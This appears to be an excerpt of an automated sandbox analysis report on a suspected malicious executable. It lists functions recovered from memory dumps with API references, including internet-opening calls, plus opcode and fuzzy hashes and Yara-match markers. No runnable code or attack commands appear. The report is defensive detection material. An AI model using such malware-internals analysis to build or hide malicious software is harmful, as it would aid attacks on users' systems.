                                                                                                                                                                                                      • Opcode ID: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
                                                                                                                                                                                                      • Instruction ID: 01031f9733060372e49dc4c64eab98cf4f28593c37dfea0a5cce7aec6775dd8e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86f4a122e0d78ebb15d6c80d3f8db1e35e712697e4858056224195d97d86bbbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4CA10, Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                      • Instruction ID: cfe767f5fe498ab63cf4c2b8122d5a3cdec83139b3b1d2b5ffbb415a757b10da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5C19EB5E003599FCB54CFA9C881ADEFBF1FF48200F24856AE919E7301E334AA558B54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4C760, Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                                                                                                                      • Instruction ID: 53912adef222f1f4d400de72b68d9b201c3b535a25fea2618dd09c307e654751
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBB17AB5E002199FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 01FB571C, Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235221600.0000000001FB4000.00000040.00000001.sdmp, Offset: 01FB4000, based on PE: false
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                                                                                      • Instruction ID: e24a58173436b25703f274a69f8de242e2ba9c4d7478160baf3ff276064be00b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA316975906245DFDB16CE74D8D1AF5BB70EF47224F28859DC1818F122D32B9046C794
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C618D0, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                      • Instruction ID: 64209c1c1050e45811e4389e4777d55d275d4f274ce74342eb8ac558adf02649
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4211C87724518247E618C62ED5F45B6E7A5EBC623372D827AD183CF758D122E3459500
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4B000, Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                                                                                      • Instruction ID: 3a5e268aa24014eb05d8f61c7498bb73862b234dcaa4b75e08437db29458b016
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62113D4A8492C4BDCF424A7840E56EBEFA98E2B218F4A71DA88C44B743D01B150FE7A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 01FB40A3, Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235221600.0000000001FB4000.00000040.00000001.sdmp, Offset: 01FB4000, based on PE: false
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction ID: 591b851e9dc12552c3b5450ec4415e9b28d8e4313e22ac98441546e9d6961c44
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0411E173740101AFDB00DF5ADCC0FE673EAEB98260B198065ED09CB312D676E802C760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C40042, Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction ID: a4ef7ef2f38f5b63dc90ebbd64585843084dacf4457577079ed6707f01fa4837
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A118E72380210AFEB54DF65DC91FA6B3EAFB88220B198165EE08CB311D676E801C760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C63F16, Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 03C63F51
                                                                                                                                                                                                        • Part of subcall function 03C65BA8: __getptd_noexit.LIBCMT ref: 03C65BA8
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 03C63FEA
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 03C64020
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 03C6403D
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 03C64093
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03C640AF
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 03C640C6
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03C640E4
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 03C640FB
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03C64119
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 03C6418A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction ID: 9bae172920bc597368d37fbc3f5b3e0ce3be09f846fa91480d47457c37529df1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74710875A00B26ABD718DE7ACCC1B6AB3BDAF00364F194179E914DF280E771DA408791
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C684AB, Relevance: 16.6, APIs: 11, Instructions: 92COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$ExitProcess___crt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1022109855-0
                                                                                                                                                                                                      • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                      • Instruction ID: 76d6a362d75943186300300a709f9582d6bd68738557a37b3a27971a82ba6ae7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0031A0359003609BDB61FF14FCD4859B7A4EB14321709866BE905DB2B0CBB45AC9AF94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C8FC0C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03C8FC1F
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03C8FC34
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03C8FC4D
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03C8FC62
                                                                                                                                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 03C8FC74
                                                                                                                                                                                                        • Part of subcall function 03C8F914: std::exception::exception.LIBCMT ref: 03C8F92E
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03C8FC82
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03C8FC9B
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03C8FCB0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                                                                                                                                      • String ID: leM
                                                                                                                                                                                                      • API String ID: 2862078307-2926266777
                                                                                                                                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                      • Instruction ID: b7034ac54a9f5c241d4f39b45151685330bbf8e99f2413bb6a64f42df779a427
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B11B679C0030DBBCF00FFA5D855CEEBBBCEA04644B458566AD14DB641EB78A3498B94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4F010, Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3721157643-0
                                                                                                                                                                                                      • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                      • Instruction ID: 00509a68188272e787d282dca547a686b13f552cceb83b5e0dd657986e49ffdb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 221124BAA006602AC261F3B40C51EFF7BDC9F45202F0800AAFA8CD9180DA189B04A3B1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C51960, Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 65388428-0
                                                                                                                                                                                                      • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                      • Instruction ID: 3da4a40ace57e270dc78f7df85eb1a8e9443664205a0553ac90cc401d2dc86e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8513A71D40219ABDF11DBA5DC86FEFBBB8FB04B44F180025F905FA180E7746A058BA9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4F210, Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 217217746-0
                                                                                                                                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                      • Instruction ID: f162979948ce7b1ae25f598389db5d979b984c61c73ac4241336c2c49e49a6ad
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF515EB5D40209AADF11DFA1DC46FEEBBBCEB04704F140129F905FA180E775AA058BA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4F440, Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 217217746-0
                                                                                                                                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                      • Instruction ID: 96ab0248339b459a435f7847bef9e29a2e7cf8fd26503396f2cf911527de5d40
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38513076D40209AADF11DFA5DD45FEEBBBCEB04704F140129F905FA180E774AA058BA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03D066D9, Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 03D066DD
                                                                                                                                                                                                        • Part of subcall function 03C659BF: __calloc_crt.LIBCMT ref: 03C659E2
                                                                                                                                                                                                        • Part of subcall function 03C659BF: __initptd.LIBCMT ref: 03C65A04
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 03D06700
                                                                                                                                                                                                      • __get_sys_err_msg.LIBCMT ref: 03D0671E
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 03D0673B
                                                                                                                                                                                                      • __get_sys_err_msg.LIBCMT ref: 03D0676D
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 03D0678B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4066021419-0
                                                                                                                                                                                                      • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                      • Instruction ID: 75351415cd7b62a3b59fc34fbaac33ecda057ff28106b8d02e5539ca2c123e0a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F111C4396003147BEB25F6299C40BAF738CDF41E60F5504A6FD48DF680E731D92152E5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C62AD0, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1559183368-0
                                                                                                                                                                                                      • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                      • Instruction ID: d5a402c74ddcf8111058080523425a454ef7a1c18661477ef6869991d14e2b29
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9451C634A00306ABDB24CF6988C456EF7B5EF80320F188B6DE876DE2D0DB719A51DB44
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C52670, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                      • API String ID: 2102423945-2746444292
                                                                                                                                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                      • Instruction ID: a3bb59354495821746ee45eab94df2f0553690bf798f55801b14542974b883cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE15F75D40219ABCF24DFA0CD89FEEB7B8BF04304F1444A9E909E6190EB746A85CF58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4D8B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: $$$(
                                                                                                                                                                                                      • API String ID: 2102423945-3551151888
                                                                                                                                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                      • Instruction ID: 404448439c6f4bed5d9a2437c773a95b81e18dc877a38fc427bd4f572c690990
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B891C071D002189BEF21DFA4CC59BEEBBB4AF05304F144069E406FB2C1DBB65A88CB65
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C8FBDE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03C8FBF1
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03C8FC06
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                      • String ID: TeM$TeM
                                                                                                                                                                                                      • API String ID: 3728558374-3870166017
                                                                                                                                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                      • Instruction ID: cb8469af9edc07b3fcba2c8a10a2ce40728f134ae8b30110b25e5cb3172f914b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D06779C0030CBBCB00EFA5D459CDDBBB8AA04744B058466AD14DB241EA74A3499B94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4D0E0, Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 03C6197D: __wfsopen.LIBCMT ref: 03C61988
                                                                                                                                                                                                      • _fgetws.LIBCMT ref: 03C4D15C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wfsopen_fgetws
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 853134316-0
                                                                                                                                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                      • Instruction ID: 4bbd2840a6dae8f98454690248310aa0f09de28a1689586278c268c33274dedd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B991C275D003199BCF20EFA4CC887AEF7F4AF04310F190569E816EB242E776AA04CB95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03C4D540, Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Offset: 03C40000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1783060780-0
                                                                                                                                                                                                      • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                      • Instruction ID: 4a25a3293ecc616088bcdbb14b444d751faec2392d5d15e64fe0ba8f8d0bf031
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2A18FB5C00348EBEF11EBE4CC49BDEBB74AF14304F150028D406FA291D7B65A48DBA6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Analysis Process: Ln0LqSBLhS.exe PID: 6536 Parent PID: 6484 Ln0LqSBLhS.exeCOMMON

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00419F90, Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                        • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                        • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
